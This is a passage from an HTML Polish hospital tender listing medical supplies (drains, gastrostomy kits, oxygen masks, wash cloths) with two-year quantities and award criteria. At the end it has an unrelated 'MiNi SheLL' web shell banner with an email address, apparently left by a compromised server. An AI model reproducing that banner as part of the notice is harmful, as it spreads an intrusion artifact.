10	op. 48
11	op. 48
15	op. 48
16	op. 48
18	op. 48
20	op. 48
22	op. 192.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie 4   Zestaw do przetoki nerkowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 4   Zestaw do przetoki nerkowej
l.p.	Nazwa asortymentu	Rozmiar - model 	Ilość szt. na 2 lata 
a.Nefrofix - zestaw do przez skórnej przetoki nerkowej	8Ch	szt. 240.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie 5   Wkłady do zamkniętego usuwania odessanych substancji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 5   Wkłady do zamkniętego usuwania odessanych substancji
l.p.	Nazwa asortymentu	Rozmiar - model 	Ilość szt. na 2 lata 
a.Wkłady jednorazowego użytku do zamkniętego i bezpiecznego usuwania odessanych substancji +  pojemnik wielorazowy do ww. wkładów  w ramach zamówienia wkładów	1 litr, 2 litry,  3 litry	szt.  4800
		1 litr, 2 litry,  3 litry	szt. 60
b.Torba na wymiociny		szt.  1200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie 6   Dreny różne,  worki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 6   Dreny różne,  worki
l.p.	Nazwa asortymentu	Rozmiar - model	Ilość szt. na 2 lata 
a.Zestaw drenów do drenażu  jamy opłucnej - dreny do drenażu jedno i dwu butlowego 	1 - butlowy	szt. 192
		2 - butlowy	szt. 96
b.Worek do godzinowej zbiórki moczu		szt. 1200
c.Sterylny zestaw do odsysania z pola operacyjnego typu Yanakuar	Dł. drenu 200 mm, 300 mm
Śr. wew. 5 mm, 7-8 mm, 10 mm	szt. 3600
d.Jałowy dren łączący do odsysania pola operacyjnego	5mm x 200 cm
5mm x 300 cm
7mm x 200 cm
7 mm x 300 cm	
szt. 4992
e.Dren balonowy do podawania tlenu - jałowy o średnicy  3 mm	Długość drenu - 180 cm	szt. 3600
Długość drenu - 300 cm	szt. 2400
f.Maski do podawania tlenu jednorazowego użytku	z drenem	szt. 3600
		bez drenu	szt. 2400
g.Dren do ssaka niejałowy	9mm x 5mm x 1500 mm	szt. 7200
h.Przedłużacz do przewodów oddechowych		szt. 3840
i.Worek na  mocz w systemie zamkniętym		szt. 1440.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie 7   Zestaw do gastrostomii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 7   Zestaw do gastrostomii
l.p.	Nazwa asortymentu	Rozmiar - model 	Ilość szt. na 2 lata 
a.Flocare PEG - zestaw do przez skórnej endoskopowej gastrostomii	
18 mm dł. 40cm	szt. 432
b.Zgłębnik gastrostomijny Flocare G- tube	
18	szt. 48
20	szt. 24.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie 8   Zgłębnik gastrostomijny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 8   Zgłębnik gastrostomijny 
l.p.	Nazwa asortymentu	Rozmiar - model 	Ilość szt. na 2 lata 
a.Zgłębnik gastrostomijny Flocare G- tube	
16	szt. 24
22	szt. 24.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie 9   Mocowanie do rurek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 9   Mocowanie do rurek 
l.p.	Nazwa asortymentu	Rozmiar - model 	Ilość szt. na 2 lata 
a.Mocowanie do rurek intubacyjnych 		szt. 1440
b.Mocowanie do rurek tracheotomijnych	szt. 3600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie 10   Myjka jednorazowa do mycia ciała pacjentów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 10   Myjka jednorazowa do mycia ciała pacjentów
l.p.	Nazwa asortymentu	Rozmiar - model	Ilość szt. na 2 lata 
a.Myjka jednorazowa do mycia ciała pacjentów 		szt. 14400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. jakość - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com